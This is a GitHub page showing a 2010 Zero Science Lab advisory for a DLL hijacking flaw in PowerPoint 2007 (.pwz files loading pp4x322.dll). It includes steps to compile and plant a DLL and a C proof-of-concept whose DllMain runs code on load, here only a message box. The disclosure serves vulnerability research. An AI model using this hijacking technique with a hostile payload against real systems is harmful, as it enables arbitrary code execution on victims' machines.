forked from liquidworm/advisory
-
Notifications
You must be signed in to change notification settings - Fork 0
/
ZSL-2010-4957
61 lines (41 loc) · 1.29 KB
/
ZSL-2010-4957
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
/*
Microsoft Office PowerPoint 2007 v12.0.4518 (pp4x322.dll) DLL Hijacking Exploit
Vendor: Microsoft Corp.
Product Web Page: http://www.microsoft.com
Affected Version: 12.0.4518.1014 MSO (12.0.4518.1014)
Summary: Microsoft PowerPoint is a presentation program by Microsoft.
It is part of the Microsoft Office suite, and runs on Microsoft Windows
and Apple's Mac OS X operating system.
Desc: MS PowerPoint 2007 suffers from a dll hijacking vulnerability
that enables the attacker to execute arbitrary code on a local
level. The vulnerable extension is .pwz thru pp4x322.dll and pp7x32.dll
libraries.
----
gcc -shared -o pp4x322.dll mspowerp.c
Compile and rename to pp4x322.dll, create a file test.pwz and put both
files in same dir and execute.
----
Tested on Microsoft Windows XP Professional SP3 (EN)
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
liquidworm gmail com
Zero Science Lab - http://www.zeroscience.mk
25.08.2010
*/
#include <windows.h>
BOOL WINAPI DllMain (HANDLE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
{
switch (fdwReason)
{
case DLL_PROCESS_ATTACH:
dll_mll();
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}
int dll_mll()
{
MessageBox(0, "DLL Hijacked!", "DLL Message", MB_OK);
}